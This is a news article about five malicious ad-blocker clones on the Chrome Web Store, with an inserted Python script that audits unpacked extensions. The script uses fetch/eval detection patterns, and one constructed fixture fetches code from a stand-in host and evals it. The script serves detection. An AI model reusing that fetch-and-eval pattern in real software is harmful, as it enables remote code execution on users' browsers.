Research unearths five malicious ad-blocker extensions on the Chrome Web Store that were installed by 20 million Chrome users before Google removed them.
The bogus ad blockers were discovered by researchers at AdGuard, a Moscow-based maker of ad-blocking and anti-tracking tech.
Following AdGuard’s report on the fake ad blockers in the Chrome Web Store, Google removed the suspect extensions, which have been installed on 20 million Chrome instances over the past year.
The most popular fake ad blocker was AdRemover for Google Chrome, which had over 10 million users, putting a massive botnet of infected browsers at its authors’ disposal.
“Basically, this is a botnet composed of browsers infected with the fake ad-block extensions. The browser will do whatever the command-center server owner orders it to do,” wrote AdGuard co-founder Andrey Meshkov.
Cloning legitimate ad blockers, adding malicious features and distributing them in the Chrome store has become a popular tactic for cybercriminals. Last year security personality SwiftOnSecurity discovered a fake Adblock Plus Chrome extension that tricked 37,000 users into installing it.
Meshkov says the main problem is that extensions are poorly vetted by the Chrome Web Store. The authors of fake extensions are also using keyword spam in the extension description to get a top ranking in the Chrome Web Store for searches for ‘adblocker’.
“Instead of using tricky names, they now spam keywords in the extension description to try to make the top search results,” wrote Meshkov.
There were two other fake ad blockers, both ripped off from legitimate ad-blocking code: a fake uBlock Plus with eight million users and a fake Adblock Pro with two million users. Two more cloned extensions that used similar tactics were HD for YouTube, with 400,000 users, and Webutation, with 30,000 users.
A Reddit user noticed the same uBlock Plus clone Meshkov found back in October, meaning the extensions have been available on the Chrome Web Store for at least six months. That longevity, along with a top ranking for ‘ad blocker’ searches, explains how the extensions attracted so many users.
Meshkov found that the fake AdRemover for Google Chrome included hidden scripts that allow the authors to track websites visited and alter browser behavior.
“They definitely could alter anything on any website if they receive such command from the command server,” Meshkov said.
“Also, all five were connecting to the very same command server, and they were using the very same approach — the remote script was hidden inside an image.”
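As an added illustration (not code from AdGuard, the article, or the extensions themselves), here is a small static audit of an unpacked extension directory that flags the combination Meshkov describes: broad host access together with code that fetches remote data and executes it. The two extension fixtures, the host example.invalid and the helper name unhide are constructed for the example.

```python
import json, os, re, tempfile

# Static heuristics for an unpacked extension: code that executes data it
# fetched at runtime, plus a manifest that asks for access to every site.
SUSPICIOUS_CODE = {
    "dynamic-eval": re.compile(r"\b(eval|new Function)\s*\("),
    "remote-fetch": re.compile(r"\bfetch\s*\(|XMLHttpRequest"),
}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

def audit_extension(ext_dir):
    """Return sorted findings for one unpacked extension directory."""
    with open(os.path.join(ext_dir, "manifest.json"), encoding="utf-8") as f:
        manifest = json.load(f)
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    findings = {"broad-host-access"} if perms & BROAD_HOSTS else set()
    for root, _, files in os.walk(ext_dir):
        for name in files:
            if not name.endswith(".js"):
                continue
            with open(os.path.join(root, name), encoding="utf-8", errors="replace") as f:
                src = f.read()
            for label, pattern in SUSPICIOUS_CODE.items():
                if pattern.search(src):
                    findings.add(f"{label}:{name}")
    # Fetching remote data and eval-ing in the same package is the pattern to escalate.
    if {"remote-fetch", "dynamic-eval"} <= {k.split(":")[0] for k in findings}:
        findings.add("remote-code-execution-pattern")
    return sorted(findings)

def write_fixture(files):  # constructed extension dir from a filename -> content map
    d = tempfile.mkdtemp()
    for name, content in files.items():
        with open(os.path.join(d, name), "w", encoding="utf-8") as f:
            f.write(content)
    return d

# Constructed fixtures; not the code of the extensions AdGuard reported.
CLONE = write_fixture({
    "manifest.json": json.dumps({"name": "Constructed Ad Remover", "manifest_version": 2,
                                 "permissions": ["<all_urls>", "tabs"]}),
    "background.js": 'fetch("https://example.invalid/logo.png").then(r => r.text())'
                     '.then(t => eval(unhide(t)));  // unhide is a hypothetical decoder\n',
})
CLEAN = write_fixture({
    "manifest.json": json.dumps({"name": "Constructed Blocker", "manifest_version": 2,
                                 "permissions": ["storage"]}),
    "background.js": "chrome.storage.local.get('rules', r => console.log(r));\n",
})
```

Run it against the unpacked extension folders under a Chrome profile's Extensions directory; anything reporting remote-code-execution-pattern deserves a manual look before it stays installed.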
The good news is that, after Google removed the extensions from the Chrome Web Store, they were also disabled on the Chrome instances where they had been installed.
“Google is able to disable and remove Chrome extensions remotely and it seems that this is exactly what’s happening,” added Meshkov.